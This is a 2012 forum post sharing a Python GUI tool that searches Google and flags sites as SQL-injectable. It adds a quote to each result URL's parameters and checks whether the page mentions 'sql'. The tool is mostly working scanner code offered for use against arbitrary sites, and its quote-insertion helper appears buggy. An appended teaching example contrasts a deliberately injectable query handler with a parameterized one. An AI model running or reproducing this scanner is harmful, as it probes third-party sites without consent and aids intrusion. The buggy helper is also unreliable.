Author Topic: [Python] Basic SQL vuln search  (Read 1208 times)

relax
[Python] Basic SQL vuln search
« on: September 07, 2012, 12:04:25 am »
So I decided to try out Python; usually I am a Java guy.
I don't know if it's because I am a total noob in Python or if it's actually harder than Java.
Anyhow, I made a small program with a GUI that searches Google for possible SQL injection vulnerabilities.
I know functions like this already exist in programs like sqlmap, but this was more a fun startup project for my learning in Python. Well, I thought I would share :)

Code:
import sys
import urllib, urllib2
import simplejson
import time
from PyQt4 import QtCore, QtGui
from gui import Ui_MainWindow
from array import *
global x
global pg
x = 0
pg = 0

class BSQLS(QtGui.QMainWindow):
  def __init__(self, parent=None):
    QtGui.QWidget.__init__(self, parent)
    self.ui = Ui_MainWindow()
    self.ui.setupUi(self)
    self.ui.go.clicked.connect(self.get_data)
    self.ui.clear.clicked.connect(self.ui.txt.clear)
   
  def get_data(self):
    antres = int(self.ui.star.text())+1
    global x
    global pg
    x = 0
    if str(self.ui.txt.toPlainText()).find('Welcome') != -1: self.ui.txt.setText('')
    start = 1
    for i in xrange(start,antres):
      pg =  i
      if i != start:
        self.ui.status.setText('Status: waiting 10sec so we dont piss off google')
        app.processEvents()
        time.sleep(10)
      try:
        start2 = (i - 1) * 8
        usock = urllib.urlopen('http://ajax.googleapis.com/ajax/services/search/web?v=1.0&q=%s&start=%d&rsz=8' % (self.ui.search.text(), start2))
        data = usock.read()       
        json = simplejson.loads(data)
        usock.close()
        results = json['responseData']['results']
        foundsites = []
        for g in results:
          found = str(urllib.unquote(str(g['url'])))
          foundsites.append(found)
        self.check(foundsites)
      except:
        self.ui.status.setText('Status: Something went wrong when trying to get data from google')
        app.processEvents()
    self.ui.status.setText('Status: search completed')
    self.ui.txt.append('Found %d possible vulnerable sites' % x)
     
  def check(self, site):
    newurl = []
    global x
    global pg
    for i in xrange(0,8):
      ii = i+1
      newurl.append(self.replace_all(site[i],'='))
      usock = urllib.urlopen(newurl[i])
      data = str.lower(usock.read())
      tal = (((pg-1)*8)+i+1) / (float(self.ui.star.text())*8)*100
      self.ui.status.setText('Status: searching...                                          %d %s' % (tal, u"\u0025"))
      app.processEvents()
      usock.close()
      if data.find('sql') != -1:
        self.ui.txt.append(newurl[i])
        app.processEvents()
        x = x + 1

  def replace_all(self, s, key):
    start = 0
    while True:
      nr = s.find(key,start)
      if(nr==-1):
        return f
      else:
        start += len(key)
        f = s[:nr-len(s)+1] + '\'' + s[nr+1:len(s)]

if __name__ == '__main__':
  app = QtGui.QApplication(sys.argv)
  myapp = BSQLS()
  myapp.show()
  sys.exit(app.exec_())

Changed some code so it's more stable now. Don't get errors from Google anymore.
Enjoy

« Last Edit: September 07, 2012, 05:38:46 pm by relax »
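
The script above inserts a quote after each `=` in a URL and flags any response whose body contains `sql`. What produces that signal on the server side, and what removes it, as an added example that is not part of the original post (the table, handler names and data are constructed assumptions):

```python
import sqlite3

# Constructed sample data: an in-memory table standing in for a site's database.
db = sqlite3.connect(":memory:")
db.execute("CREATE TABLE news (id INTEGER PRIMARY KEY, title TEXT)")
db.execute("INSERT INTO news VALUES (1, 'Hello world')")


def page_concat(raw_id):
    """'Before': value concatenated into the SQL, driver error echoed to the client."""
    try:
        row = db.execute("SELECT title FROM news WHERE id = " + raw_id).fetchone()
        return row[0] if row else "Not found"
    except sqlite3.Error as exc:
        # Parser details end up in the response body, which is what the check matches.
        return "SQL error: %s" % exc


def page_bound(raw_id):
    """'After': input validated, value bound as a parameter, errors kept server-side."""
    try:
        item_id = int(raw_id)
    except ValueError:
        return "Not found"
    try:
        row = db.execute("SELECT title FROM news WHERE id = ?", (item_id,)).fetchone()
    except sqlite3.Error:
        return "Internal error"  # details belong in the server log, not the page
    return row[0] if row else "Not found"


def looks_flagged(body):
    """Same test the posted script applies: lower-cased body contains 'sql'."""
    return body.lower().find("sql") != -1


if __name__ == "__main__":
    for value in ("1", "'1"):  # "'1" is what the script's quote insertion yields for ?id=1
        for handler in (page_concat, page_bound):
            body = handler(value)
            print("%-12s %-4r flagged=%-5s %s" % (handler.__name__, value, looks_flagged(body), body))
```

The bound handler returns the same page for a malformed value as for a missing record, so the response carries no database error text for such a check to match.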